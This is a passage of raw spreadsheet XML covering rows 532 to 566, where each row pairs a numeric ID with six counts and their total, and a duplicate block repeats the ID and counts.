      </c>
      <c r="Q532" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="533" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A533" s="7">
        <v>1321</v>
      </c>
      <c r="B533" s="8">
        <v>24</v>
      </c>
      <c r="C533" s="8">
        <v>0</v>
      </c>
      <c r="D533" s="8">
        <v>4</v>
      </c>
      <c r="E533" s="8">
        <v>2</v>
      </c>
      <c r="F533" s="8">
        <v>10</v>
      </c>
      <c r="G533" s="8">
        <v>10</v>
      </c>
      <c r="H533" s="8">
        <v>50</v>
      </c>
      <c r="K533" s="7">
        <v>1321</v>
      </c>
      <c r="L533" s="8">
        <v>24</v>
      </c>
      <c r="M533" s="8">
        <v>0</v>
      </c>
      <c r="N533" s="8">
        <v>4</v>
      </c>
      <c r="O533" s="8">
        <v>2</v>
      </c>
      <c r="P533" s="8">
        <v>10</v>
      </c>
      <c r="Q533" s="8">
        <v>10</v>
      </c>
    </row>
    <row r="534" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A534" s="7">
        <v>1324</v>
      </c>
      <c r="B534" s="8">
        <v>0</v>
      </c>
      <c r="C534" s="8">
        <v>0</v>
      </c>
      <c r="D534" s="8">
        <v>0</v>
      </c>
      <c r="E534" s="8">
        <v>0</v>
      </c>
      <c r="F534" s="8">
        <v>4</v>
      </c>
      <c r="G534" s="8">
        <v>12</v>
      </c>
      <c r="H534" s="8">
        <v>16</v>
      </c>
      <c r="K534" s="7">
        <v>1324</v>
      </c>
      <c r="L534" s="8">
        <v>0</v>
      </c>
      <c r="M534" s="8">
        <v>0</v>
      </c>
      <c r="N534" s="8">
        <v>0</v>
      </c>
      <c r="O534" s="8">
        <v>0</v>
      </c>
      <c r="P534" s="8">
        <v>4</v>
      </c>
      <c r="Q534" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="535" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A535" s="7">
        <v>1326</v>
      </c>
      <c r="B535" s="8">
        <v>7</v>
      </c>
      <c r="C535" s="8">
        <v>2</v>
      </c>
      <c r="D535" s="8">
        <v>19</v>
      </c>
      <c r="E535" s="8">
        <v>21</v>
      </c>
      <c r="F535" s="8">
        <v>6</v>
      </c>
      <c r="G535" s="8">
        <v>5</v>
      </c>
      <c r="H535" s="8">
        <v>60</v>
      </c>
      <c r="K535" s="7">
        <v>1326</v>
      </c>
      <c r="L535" s="8">
        <v>7</v>
      </c>
      <c r="M535" s="8">
        <v>2</v>
      </c>
      <c r="N535" s="8">
        <v>19</v>
      </c>
      <c r="O535" s="8">
        <v>21</v>
      </c>
      <c r="P535" s="8">
        <v>6</v>
      </c>
      <c r="Q535" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="536" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A536" s="7">
        <v>1327</v>
      </c>
      <c r="B536" s="8">
        <v>26</v>
      </c>
      <c r="C536" s="8">
        <v>0</v>
      </c>
      <c r="D536" s="8">
        <v>0</v>
      </c>
      <c r="E536" s="8">
        <v>0</v>
      </c>
      <c r="F536" s="8">
        <v>36</v>
      </c>
      <c r="G536" s="8">
        <v>21</v>
      </c>
      <c r="H536" s="8">
        <v>83</v>
      </c>
      <c r="K536" s="7">
        <v>1327</v>
      </c>
      <c r="L536" s="8">
        <v>26</v>
      </c>
      <c r="M536" s="8">
        <v>0</v>
      </c>
      <c r="N536" s="8">
        <v>0</v>
      </c>
      <c r="O536" s="8">
        <v>0</v>
      </c>
      <c r="P536" s="8">
        <v>36</v>
      </c>
      <c r="Q536" s="8">
        <v>21</v>
      </c>
    </row>
    <row r="537" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A537" s="7">
        <v>1337</v>
      </c>
      <c r="B537" s="8">
        <v>25</v>
      </c>
      <c r="C537" s="8">
        <v>0</v>
      </c>
      <c r="D537" s="8">
        <v>0</v>
      </c>
      <c r="E537" s="8">
        <v>0</v>
      </c>
      <c r="F537" s="8">
        <v>84</v>
      </c>
      <c r="G537" s="8">
        <v>45</v>
      </c>
      <c r="H537" s="8">
        <v>154</v>
      </c>
      <c r="K537" s="7">
        <v>1337</v>
      </c>
      <c r="L537" s="8">
        <v>25</v>
      </c>
      <c r="M537" s="8">
        <v>0</v>
      </c>
      <c r="N537" s="8">
        <v>0</v>
      </c>
      <c r="O537" s="8">
        <v>0</v>
      </c>
      <c r="P537" s="8">
        <v>84</v>
      </c>
      <c r="Q537" s="8">
        <v>45</v>
      </c>
    </row>
    <row r="538" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A538" s="7">
        <v>1341</v>
      </c>
      <c r="B538" s="8">
        <v>0</v>
      </c>
      <c r="C538" s="8">
        <v>0</v>
      </c>
      <c r="D538" s="8">
        <v>8</v>
      </c>
      <c r="E538" s="8">
        <v>0</v>
      </c>
      <c r="F538" s="8">
        <v>3</v>
      </c>
      <c r="G538" s="8">
        <v>3</v>
      </c>
      <c r="H538" s="8">
        <v>14</v>
      </c>
      <c r="K538" s="7">
        <v>1341</v>
      </c>
      <c r="L538" s="8">
        <v>0</v>
      </c>
      <c r="M538" s="8">
        <v>0</v>
      </c>
      <c r="N538" s="8">
        <v>8</v>
      </c>
      <c r="O538" s="8">
        <v>0</v>
      </c>
      <c r="P538" s="8">
        <v>3</v>
      </c>
      <c r="Q538" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="539" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A539" s="7">
        <v>1344</v>
      </c>
      <c r="B539" s="8">
        <v>26</v>
      </c>
      <c r="C539" s="8">
        <v>0</v>
      </c>
      <c r="D539" s="8">
        <v>20</v>
      </c>
      <c r="E539" s="8">
        <v>2</v>
      </c>
      <c r="F539" s="8">
        <v>24</v>
      </c>
      <c r="G539" s="8">
        <v>7</v>
      </c>
      <c r="H539" s="8">
        <v>79</v>
      </c>
      <c r="K539" s="7">
        <v>1344</v>
      </c>
      <c r="L539" s="8">
        <v>26</v>
      </c>
      <c r="M539" s="8">
        <v>0</v>
      </c>
      <c r="N539" s="8">
        <v>20</v>
      </c>
      <c r="O539" s="8">
        <v>2</v>
      </c>
      <c r="P539" s="8">
        <v>24</v>
      </c>
      <c r="Q539" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="540" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A540" s="7">
        <v>1347</v>
      </c>
      <c r="B540" s="8">
        <v>20</v>
      </c>
      <c r="C540" s="8">
        <v>2</v>
      </c>
      <c r="D540" s="8">
        <v>23</v>
      </c>
      <c r="E540" s="8">
        <v>7</v>
      </c>
      <c r="F540" s="8">
        <v>10</v>
      </c>
      <c r="G540" s="8">
        <v>3</v>
      </c>
      <c r="H540" s="8">
        <v>65</v>
      </c>
      <c r="K540" s="7">
        <v>1347</v>
      </c>
      <c r="L540" s="8">
        <v>20</v>
      </c>
      <c r="M540" s="8">
        <v>2</v>
      </c>
      <c r="N540" s="8">
        <v>23</v>
      </c>
      <c r="O540" s="8">
        <v>7</v>
      </c>
      <c r="P540" s="8">
        <v>10</v>
      </c>
      <c r="Q540" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="541" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A541" s="7">
        <v>1348</v>
      </c>
      <c r="B541" s="8">
        <v>26</v>
      </c>
      <c r="C541" s="8">
        <v>1</v>
      </c>
      <c r="D541" s="8">
        <v>45</v>
      </c>
      <c r="E541" s="8">
        <v>170</v>
      </c>
      <c r="F541" s="8">
        <v>20</v>
      </c>
      <c r="G541" s="8">
        <v>60</v>
      </c>
      <c r="H541" s="8">
        <v>322</v>
      </c>
      <c r="K541" s="7">
        <v>1348</v>
      </c>
      <c r="L541" s="8">
        <v>26</v>
      </c>
      <c r="M541" s="8">
        <v>1</v>
      </c>
      <c r="N541" s="8">
        <v>45</v>
      </c>
      <c r="O541" s="8">
        <v>170</v>
      </c>
      <c r="P541" s="8">
        <v>20</v>
      </c>
      <c r="Q541" s="8">
        <v>60</v>
      </c>
    </row>
    <row r="542" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A542" s="7">
        <v>1349</v>
      </c>
      <c r="B542" s="8">
        <v>1</v>
      </c>
      <c r="C542" s="8">
        <v>0</v>
      </c>
      <c r="D542" s="8">
        <v>0</v>
      </c>
      <c r="E542" s="8">
        <v>0</v>
      </c>
      <c r="F542" s="8">
        <v>0</v>
      </c>
      <c r="G542" s="8">
        <v>0</v>
      </c>
      <c r="H542" s="8">
        <v>1</v>
      </c>
      <c r="K542" s="7">
        <v>1349</v>
      </c>
      <c r="L542" s="8">
        <v>1</v>
      </c>
      <c r="M542" s="8">
        <v>0</v>
      </c>
      <c r="N542" s="8">
        <v>0</v>
      </c>
      <c r="O542" s="8">
        <v>0</v>
      </c>
      <c r="P542" s="8">
        <v>0</v>
      </c>
      <c r="Q542" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="543" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A543" s="7">
        <v>1352</v>
      </c>
      <c r="B543" s="8">
        <v>22</v>
      </c>
      <c r="C543" s="8">
        <v>1</v>
      </c>
      <c r="D543" s="8">
        <v>0</v>
      </c>
      <c r="E543" s="8">
        <v>0</v>
      </c>
      <c r="F543" s="8">
        <v>46</v>
      </c>
      <c r="G543" s="8">
        <v>1</v>
      </c>
      <c r="H543" s="8">
        <v>70</v>
      </c>
      <c r="K543" s="7">
        <v>1352</v>
      </c>
      <c r="L543" s="8">
        <v>22</v>
      </c>
      <c r="M543" s="8">
        <v>1</v>
      </c>
      <c r="N543" s="8">
        <v>0</v>
      </c>
      <c r="O543" s="8">
        <v>0</v>
      </c>
      <c r="P543" s="8">
        <v>46</v>
      </c>
      <c r="Q543" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="544" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A544" s="7">
        <v>1353</v>
      </c>
      <c r="B544" s="8">
        <v>26</v>
      </c>
      <c r="C544" s="8">
        <v>1</v>
      </c>
      <c r="D544" s="8">
        <v>8</v>
      </c>
      <c r="E544" s="8">
        <v>20</v>
      </c>
      <c r="F544" s="8">
        <v>6</v>
      </c>
      <c r="G544" s="8">
        <v>6</v>
      </c>
      <c r="H544" s="8">
        <v>67</v>
      </c>
      <c r="K544" s="7">
        <v>1353</v>
      </c>
      <c r="L544" s="8">
        <v>26</v>
      </c>
      <c r="M544" s="8">
        <v>1</v>
      </c>
      <c r="N544" s="8">
        <v>8</v>
      </c>
      <c r="O544" s="8">
        <v>20</v>
      </c>
      <c r="P544" s="8">
        <v>6</v>
      </c>
      <c r="Q544" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="545" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A545" s="7">
        <v>1358</v>
      </c>
      <c r="B545" s="8">
        <v>25</v>
      </c>
      <c r="C545" s="8">
        <v>1</v>
      </c>
      <c r="D545" s="8">
        <v>46</v>
      </c>
      <c r="E545" s="8">
        <v>2</v>
      </c>
      <c r="F545" s="8">
        <v>4</v>
      </c>
      <c r="G545" s="8">
        <v>7</v>
      </c>
      <c r="H545" s="8">
        <v>85</v>
      </c>
      <c r="K545" s="7">
        <v>1358</v>
      </c>
      <c r="L545" s="8">
        <v>25</v>
      </c>
      <c r="M545" s="8">
        <v>1</v>
      </c>
      <c r="N545" s="8">
        <v>46</v>
      </c>
      <c r="O545" s="8">
        <v>2</v>
      </c>
      <c r="P545" s="8">
        <v>4</v>
      </c>
      <c r="Q545" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="546" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A546" s="7">
        <v>1361</v>
      </c>
      <c r="B546" s="8">
        <v>26</v>
      </c>
      <c r="C546" s="8">
        <v>3</v>
      </c>
      <c r="D546" s="8">
        <v>0</v>
      </c>
      <c r="E546" s="8">
        <v>0</v>
      </c>
      <c r="F546" s="8">
        <v>27</v>
      </c>
      <c r="G546" s="8">
        <v>63</v>
      </c>
      <c r="H546" s="8">
        <v>119</v>
      </c>
      <c r="K546" s="7">
        <v>1361</v>
      </c>
      <c r="L546" s="8">
        <v>26</v>
      </c>
      <c r="M546" s="8">
        <v>3</v>
      </c>
      <c r="N546" s="8">
        <v>0</v>
      </c>
      <c r="O546" s="8">
        <v>0</v>
      </c>
      <c r="P546" s="8">
        <v>27</v>
      </c>
      <c r="Q546" s="8">
        <v>63</v>
      </c>
    </row>
    <row r="547" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A547" s="7">
        <v>1363</v>
      </c>
      <c r="B547" s="8">
        <v>0</v>
      </c>
      <c r="C547" s="8">
        <v>0</v>
      </c>
      <c r="D547" s="8">
        <v>45</v>
      </c>
      <c r="E547" s="8">
        <v>149</v>
      </c>
      <c r="F547" s="8">
        <v>14</v>
      </c>
      <c r="G547" s="8">
        <v>9</v>
      </c>
      <c r="H547" s="8">
        <v>217</v>
      </c>
      <c r="K547" s="7">
        <v>1363</v>
      </c>
      <c r="L547" s="8">
        <v>0</v>
      </c>
      <c r="M547" s="8">
        <v>0</v>
      </c>
      <c r="N547" s="8">
        <v>45</v>
      </c>
      <c r="O547" s="8">
        <v>149</v>
      </c>
      <c r="P547" s="8">
        <v>14</v>
      </c>
      <c r="Q547" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="548" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A548" s="7">
        <v>1365</v>
      </c>
      <c r="B548" s="8">
        <v>26</v>
      </c>
      <c r="C548" s="8">
        <v>1</v>
      </c>
      <c r="D548" s="8">
        <v>0</v>
      </c>
      <c r="E548" s="8">
        <v>0</v>
      </c>
      <c r="F548" s="8">
        <v>13</v>
      </c>
      <c r="G548" s="8">
        <v>21</v>
      </c>
      <c r="H548" s="8">
        <v>61</v>
      </c>
      <c r="K548" s="7">
        <v>1365</v>
      </c>
      <c r="L548" s="8">
        <v>26</v>
      </c>
      <c r="M548" s="8">
        <v>1</v>
      </c>
      <c r="N548" s="8">
        <v>0</v>
      </c>
      <c r="O548" s="8">
        <v>0</v>
      </c>
      <c r="P548" s="8">
        <v>13</v>
      </c>
      <c r="Q548" s="8">
        <v>21</v>
      </c>
    </row>
    <row r="549" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A549" s="7">
        <v>1367</v>
      </c>
      <c r="B549" s="8">
        <v>25</v>
      </c>
      <c r="C549" s="8">
        <v>1</v>
      </c>
      <c r="D549" s="8">
        <v>0</v>
      </c>
      <c r="E549" s="8">
        <v>0</v>
      </c>
      <c r="F549" s="8">
        <v>5</v>
      </c>
      <c r="G549" s="8">
        <v>5</v>
      </c>
      <c r="H549" s="8">
        <v>36</v>
      </c>
      <c r="K549" s="7">
        <v>1367</v>
      </c>
      <c r="L549" s="8">
        <v>25</v>
      </c>
      <c r="M549" s="8">
        <v>1</v>
      </c>
      <c r="N549" s="8">
        <v>0</v>
      </c>
      <c r="O549" s="8">
        <v>0</v>
      </c>
      <c r="P549" s="8">
        <v>5</v>
      </c>
      <c r="Q549" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="550" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A550" s="7">
        <v>1369</v>
      </c>
      <c r="B550" s="8">
        <v>8</v>
      </c>
      <c r="C550" s="8">
        <v>0</v>
      </c>
      <c r="D550" s="8">
        <v>0</v>
      </c>
      <c r="E550" s="8">
        <v>0</v>
      </c>
      <c r="F550" s="8">
        <v>0</v>
      </c>
      <c r="G550" s="8">
        <v>5</v>
      </c>
      <c r="H550" s="8">
        <v>13</v>
      </c>
      <c r="K550" s="7">
        <v>1369</v>
      </c>
      <c r="L550" s="8">
        <v>8</v>
      </c>
      <c r="M550" s="8">
        <v>0</v>
      </c>
      <c r="N550" s="8">
        <v>0</v>
      </c>
      <c r="O550" s="8">
        <v>0</v>
      </c>
      <c r="P550" s="8">
        <v>0</v>
      </c>
      <c r="Q550" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="551" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A551" s="7">
        <v>1375</v>
      </c>
      <c r="B551" s="8">
        <v>24</v>
      </c>
      <c r="C551" s="8">
        <v>1</v>
      </c>
      <c r="D551" s="8">
        <v>0</v>
      </c>
      <c r="E551" s="8">
        <v>0</v>
      </c>
      <c r="F551" s="8">
        <v>20</v>
      </c>
      <c r="G551" s="8">
        <v>3</v>
      </c>
      <c r="H551" s="8">
        <v>48</v>
      </c>
      <c r="K551" s="7">
        <v>1375</v>
      </c>
      <c r="L551" s="8">
        <v>24</v>
      </c>
      <c r="M551" s="8">
        <v>1</v>
      </c>
      <c r="N551" s="8">
        <v>0</v>
      </c>
      <c r="O551" s="8">
        <v>0</v>
      </c>
      <c r="P551" s="8">
        <v>20</v>
      </c>
      <c r="Q551" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="552" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A552" s="7">
        <v>1379</v>
      </c>
      <c r="B552" s="8">
        <v>30</v>
      </c>
      <c r="C552" s="8">
        <v>1</v>
      </c>
      <c r="D552" s="8">
        <v>3</v>
      </c>
      <c r="E552" s="8">
        <v>23</v>
      </c>
      <c r="F552" s="8">
        <v>0</v>
      </c>
      <c r="G552" s="8">
        <v>0</v>
      </c>
      <c r="H552" s="8">
        <v>57</v>
      </c>
      <c r="K552" s="7">
        <v>1379</v>
      </c>
      <c r="L552" s="8">
        <v>30</v>
      </c>
      <c r="M552" s="8">
        <v>1</v>
      </c>
      <c r="N552" s="8">
        <v>3</v>
      </c>
      <c r="O552" s="8">
        <v>23</v>
      </c>
      <c r="P552" s="8">
        <v>0</v>
      </c>
      <c r="Q552" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="553" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A553" s="7">
        <v>1380</v>
      </c>
      <c r="B553" s="8">
        <v>4</v>
      </c>
      <c r="C553" s="8">
        <v>2</v>
      </c>
      <c r="D553" s="8">
        <v>0</v>
      </c>
      <c r="E553" s="8">
        <v>0</v>
      </c>
      <c r="F553" s="8">
        <v>0</v>
      </c>
      <c r="G553" s="8">
        <v>15</v>
      </c>
      <c r="H553" s="8">
        <v>21</v>
      </c>
      <c r="K553" s="7">
        <v>1380</v>
      </c>
      <c r="L553" s="8">
        <v>4</v>
      </c>
      <c r="M553" s="8">
        <v>2</v>
      </c>
      <c r="N553" s="8">
        <v>0</v>
      </c>
      <c r="O553" s="8">
        <v>0</v>
      </c>
      <c r="P553" s="8">
        <v>0</v>
      </c>
      <c r="Q553" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="554" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A554" s="7">
        <v>1381</v>
      </c>
      <c r="B554" s="8">
        <v>28</v>
      </c>
      <c r="C554" s="8">
        <v>2</v>
      </c>
      <c r="D554" s="8">
        <v>0</v>
      </c>
      <c r="E554" s="8">
        <v>0</v>
      </c>
      <c r="F554" s="8">
        <v>46</v>
      </c>
      <c r="G554" s="8">
        <v>11</v>
      </c>
      <c r="H554" s="8">
        <v>87</v>
      </c>
      <c r="K554" s="7">
        <v>1381</v>
      </c>
      <c r="L554" s="8">
        <v>28</v>
      </c>
      <c r="M554" s="8">
        <v>2</v>
      </c>
      <c r="N554" s="8">
        <v>0</v>
      </c>
      <c r="O554" s="8">
        <v>0</v>
      </c>
      <c r="P554" s="8">
        <v>46</v>
      </c>
      <c r="Q554" s="8">
        <v>11</v>
      </c>
    </row>
    <row r="555" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A555" s="7">
        <v>1384</v>
      </c>
      <c r="B555" s="8">
        <v>6</v>
      </c>
      <c r="C555" s="8">
        <v>1</v>
      </c>
      <c r="D555" s="8">
        <v>37</v>
      </c>
      <c r="E555" s="8">
        <v>57</v>
      </c>
      <c r="F555" s="8">
        <v>94</v>
      </c>
      <c r="G555" s="8">
        <v>57</v>
      </c>
      <c r="H555" s="8">
        <v>252</v>
      </c>
      <c r="K555" s="7">
        <v>1384</v>
      </c>
      <c r="L555" s="8">
        <v>6</v>
      </c>
      <c r="M555" s="8">
        <v>1</v>
      </c>
      <c r="N555" s="8">
        <v>37</v>
      </c>
      <c r="O555" s="8">
        <v>57</v>
      </c>
      <c r="P555" s="8">
        <v>94</v>
      </c>
      <c r="Q555" s="8">
        <v>57</v>
      </c>
    </row>
    <row r="556" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A556" s="7">
        <v>1385</v>
      </c>
      <c r="B556" s="8">
        <v>25</v>
      </c>
      <c r="C556" s="8">
        <v>0</v>
      </c>
      <c r="D556" s="8">
        <v>0</v>
      </c>
      <c r="E556" s="8">
        <v>0</v>
      </c>
      <c r="F556" s="8">
        <v>14</v>
      </c>
      <c r="G556" s="8">
        <v>0</v>
      </c>
      <c r="H556" s="8">
        <v>39</v>
      </c>
      <c r="K556" s="7">
        <v>1385</v>
      </c>
      <c r="L556" s="8">
        <v>25</v>
      </c>
      <c r="M556" s="8">
        <v>0</v>
      </c>
      <c r="N556" s="8">
        <v>0</v>
      </c>
      <c r="O556" s="8">
        <v>0</v>
      </c>
      <c r="P556" s="8">
        <v>14</v>
      </c>
      <c r="Q556" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="557" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A557" s="7">
        <v>1386</v>
      </c>
      <c r="B557" s="8">
        <v>26</v>
      </c>
      <c r="C557" s="8">
        <v>1</v>
      </c>
      <c r="D557" s="8">
        <v>30</v>
      </c>
      <c r="E557" s="8">
        <v>40</v>
      </c>
      <c r="F557" s="8">
        <v>6</v>
      </c>
      <c r="G557" s="8">
        <v>8</v>
      </c>
      <c r="H557" s="8">
        <v>111</v>
      </c>
      <c r="K557" s="7">
        <v>1386</v>
      </c>
      <c r="L557" s="8">
        <v>26</v>
      </c>
      <c r="M557" s="8">
        <v>1</v>
      </c>
      <c r="N557" s="8">
        <v>30</v>
      </c>
      <c r="O557" s="8">
        <v>40</v>
      </c>
      <c r="P557" s="8">
        <v>6</v>
      </c>
      <c r="Q557" s="8">
        <v>8</v>
      </c>
    </row>
    <row r="558" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A558" s="7">
        <v>1388</v>
      </c>
      <c r="B558" s="8">
        <v>0</v>
      </c>
      <c r="C558" s="8">
        <v>0</v>
      </c>
      <c r="D558" s="8">
        <v>56</v>
      </c>
      <c r="E558" s="8">
        <v>201</v>
      </c>
      <c r="F558" s="8">
        <v>11</v>
      </c>
      <c r="G558" s="8">
        <v>4</v>
      </c>
      <c r="H558" s="8">
        <v>272</v>
      </c>
      <c r="K558" s="7">
        <v>1388</v>
      </c>
      <c r="L558" s="8">
        <v>0</v>
      </c>
      <c r="M558" s="8">
        <v>0</v>
      </c>
      <c r="N558" s="8">
        <v>56</v>
      </c>
      <c r="O558" s="8">
        <v>201</v>
      </c>
      <c r="P558" s="8">
        <v>11</v>
      </c>
      <c r="Q558" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="559" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A559" s="7">
        <v>1391</v>
      </c>
      <c r="B559" s="8">
        <v>30</v>
      </c>
      <c r="C559" s="8">
        <v>0</v>
      </c>
      <c r="D559" s="8">
        <v>0</v>
      </c>
      <c r="E559" s="8">
        <v>10</v>
      </c>
      <c r="F559" s="8">
        <v>0</v>
      </c>
      <c r="G559" s="8">
        <v>0</v>
      </c>
      <c r="H559" s="8">
        <v>40</v>
      </c>
      <c r="K559" s="7">
        <v>1391</v>
      </c>
      <c r="L559" s="8">
        <v>30</v>
      </c>
      <c r="M559" s="8">
        <v>0</v>
      </c>
      <c r="N559" s="8">
        <v>0</v>
      </c>
      <c r="O559" s="8">
        <v>10</v>
      </c>
      <c r="P559" s="8">
        <v>0</v>
      </c>
      <c r="Q559" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="560" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A560" s="7">
        <v>1393</v>
      </c>
      <c r="B560" s="8">
        <v>25</v>
      </c>
      <c r="C560" s="8">
        <v>1</v>
      </c>
      <c r="D560" s="8">
        <v>6</v>
      </c>
      <c r="E560" s="8">
        <v>0</v>
      </c>
      <c r="F560" s="8">
        <v>4</v>
      </c>
      <c r="G560" s="8">
        <v>2</v>
      </c>
      <c r="H560" s="8">
        <v>38</v>
      </c>
      <c r="K560" s="7">
        <v>1393</v>
      </c>
      <c r="L560" s="8">
        <v>25</v>
      </c>
      <c r="M560" s="8">
        <v>1</v>
      </c>
      <c r="N560" s="8">
        <v>6</v>
      </c>
      <c r="O560" s="8">
        <v>0</v>
      </c>
      <c r="P560" s="8">
        <v>4</v>
      </c>
      <c r="Q560" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="561" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A561" s="7">
        <v>1397</v>
      </c>
      <c r="B561" s="8">
        <v>30</v>
      </c>
      <c r="C561" s="8">
        <v>0</v>
      </c>
      <c r="D561" s="8">
        <v>2</v>
      </c>
      <c r="E561" s="8">
        <v>0</v>
      </c>
      <c r="F561" s="8">
        <v>3</v>
      </c>
      <c r="G561" s="8">
        <v>0</v>
      </c>
      <c r="H561" s="8">
        <v>35</v>
      </c>
      <c r="K561" s="7">
        <v>1397</v>
      </c>
      <c r="L561" s="8">
        <v>30</v>
      </c>
      <c r="M561" s="8">
        <v>0</v>
      </c>
      <c r="N561" s="8">
        <v>2</v>
      </c>
      <c r="O561" s="8">
        <v>0</v>
      </c>
      <c r="P561" s="8">
        <v>3</v>
      </c>
      <c r="Q561" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="562" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A562" s="7">
        <v>1398</v>
      </c>
      <c r="B562" s="8">
        <v>30</v>
      </c>
      <c r="C562" s="8">
        <v>0</v>
      </c>
      <c r="D562" s="8">
        <v>1</v>
      </c>
      <c r="E562" s="8">
        <v>0</v>
      </c>
      <c r="F562" s="8">
        <v>4</v>
      </c>
      <c r="G562" s="8">
        <v>0</v>
      </c>
      <c r="H562" s="8">
        <v>35</v>
      </c>
      <c r="K562" s="7">
        <v>1398</v>
      </c>
      <c r="L562" s="8">
        <v>30</v>
      </c>
      <c r="M562" s="8">
        <v>0</v>
      </c>
      <c r="N562" s="8">
        <v>1</v>
      </c>
      <c r="O562" s="8">
        <v>0</v>
      </c>
      <c r="P562" s="8">
        <v>4</v>
      </c>
      <c r="Q562" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="563" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A563" s="7">
        <v>1399</v>
      </c>
      <c r="B563" s="8">
        <v>30</v>
      </c>
      <c r="C563" s="8">
        <v>0</v>
      </c>
      <c r="D563" s="8">
        <v>6</v>
      </c>
      <c r="E563" s="8">
        <v>2</v>
      </c>
      <c r="F563" s="8">
        <v>6</v>
      </c>
      <c r="G563" s="8">
        <v>2</v>
      </c>
      <c r="H563" s="8">
        <v>46</v>
      </c>
      <c r="K563" s="7">
        <v>1399</v>
      </c>
      <c r="L563" s="8">
        <v>30</v>
      </c>
      <c r="M563" s="8">
        <v>0</v>
      </c>
      <c r="N563" s="8">
        <v>6</v>
      </c>
      <c r="O563" s="8">
        <v>2</v>
      </c>
      <c r="P563" s="8">
        <v>6</v>
      </c>
      <c r="Q563" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="564" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A564" s="7">
        <v>1400</v>
      </c>
      <c r="B564" s="8">
        <v>26</v>
      </c>
      <c r="C564" s="8">
        <v>1</v>
      </c>
      <c r="D564" s="8">
        <v>0</v>
      </c>
      <c r="E564" s="8">
        <v>0</v>
      </c>
      <c r="F564" s="8">
        <v>10</v>
      </c>
      <c r="G564" s="8">
        <v>3</v>
      </c>
      <c r="H564" s="8">
        <v>40</v>
      </c>
      <c r="K564" s="7">
        <v>1400</v>
      </c>
      <c r="L564" s="8">
        <v>26</v>
      </c>
      <c r="M564" s="8">
        <v>1</v>
      </c>
      <c r="N564" s="8">
        <v>0</v>
      </c>
      <c r="O564" s="8">
        <v>0</v>
      </c>
      <c r="P564" s="8">
        <v>10</v>
      </c>
      <c r="Q564" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="565" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A565" s="7">
        <v>1401</v>
      </c>
      <c r="B565" s="8">
        <v>22</v>
      </c>
      <c r="C565" s="8">
        <v>2</v>
      </c>
      <c r="D565" s="8">
        <v>10</v>
      </c>
      <c r="E565" s="8">
        <v>10</v>
      </c>
      <c r="F565" s="8">
        <v>5</v>
      </c>
      <c r="G565" s="8">
        <v>3</v>
      </c>
      <c r="H565" s="8">
        <v>52</v>
      </c>
      <c r="K565" s="7">
        <v>1401</v>
      </c>
      <c r="L565" s="8">
        <v>22</v>
      </c>
      <c r="M565" s="8">
        <v>2</v>
      </c>
      <c r="N565" s="8">
        <v>10</v>
      </c>
      <c r="O565" s="8">
        <v>10</v>
      </c>
      <c r="P565" s="8">
        <v>5</v>
      </c>
      <c r="Q565" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="566" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A566" s="7">
        <v>1402</v>
      </c>
      <c r="B566" s="8">
        <v>25</v>
      </c>
      <c r="C566" s="8">
        <v>1</v>
      </c>
      <c r="D566" s="8">
        <v>0</v>
      </c>
      <c r="E566" s="8">
        <v>0</v>
      </c>
      <c r="F566" s="8">
        <v>0</v>
      </c>
      <c r="G566" s="8">
        <v>4</v>
      </c>
      <c r="H566" s="8">
        <v>30</v>
      </c>
      <c r="K566" s="7">
        <v>1402</v>
      </c>
      <c r="L566" s="8">
        <v>25</v>
      </c>
      <c r="M566" s="8">
        <v>1</v>
      </c>
      <c r="N566" s="8">
